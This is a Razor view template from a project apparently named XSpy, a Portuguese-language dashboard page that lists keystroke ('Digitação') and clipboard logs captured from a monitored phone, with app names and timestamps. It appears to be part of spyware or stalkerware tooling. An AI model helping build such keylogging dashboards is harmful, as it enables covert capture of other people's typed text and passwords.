@{
    ViewData["Title"] = "Log de Palavras";
    ViewData["PageScript"] = "/js/app/device/phone.js";

}
@using XSpy.Shared
@model XSpy.Shared.Models.Views.Device.DeviceDataViewModel

@section Styles {
    <link rel="stylesheet" type="text/css" href="https://cdn.datatables.net/v/bs4/jszip-2.5.0/dt-1.10.23/b-1.6.5/b-html5-1.6.5/b-print-1.6.5/r-2.2.7/datatables.min.css"/>
}

<section class="content">
    <div class="container-fluid">

        <div class="row">
            <div class="col-12">
                <div class="card">
                    <div class="card-header">
                        <h3 class="card-title">Textos e cópias</h3>
                    </div>
                    <!-- /.card-header -->
                    <div class="card-body">
                        <table id="dataTable" class="table table-hover table-text-center" style="width: 100%">
                            <thead>
                            <tr>
                                <th>Conteúdo</th>
                                <th>Tipo</th>
                                <th>Aplicativo</th>
                                <th>Data</th>
                            </tr>
                            </thead>
                            <tbody>

                            @foreach (var clipboard in Model.Device.Clipboards)
                            {
                                <tr>
                                    <td>@clipboard.Content</td>
                                    @if (clipboard.IsClipboard)
                                    {
                                        <td>Cópia</td>
                                    }
                                    else
                                    {
                                        <td>Digitação</td>
                                    }
                                    <td>@clipboard.AppName</td>
                                    <td>@clipboard.CratedAt</td>
                                </tr>
                            }
                            </tbody>
                        </table>
                    </div>
                    <!-- /.card-body -->
                </div>
            </div>


        </div>

    </div>
</section>